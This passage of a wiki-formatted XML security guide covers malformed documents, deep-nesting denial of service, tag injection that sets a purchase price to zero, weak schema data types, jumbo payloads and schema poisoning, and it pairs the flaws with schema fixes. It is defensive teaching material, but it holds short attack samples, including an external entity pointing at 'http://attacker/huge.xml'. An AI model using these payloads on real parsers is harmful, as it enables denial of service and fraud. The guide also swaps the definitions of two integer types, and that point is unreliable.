According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
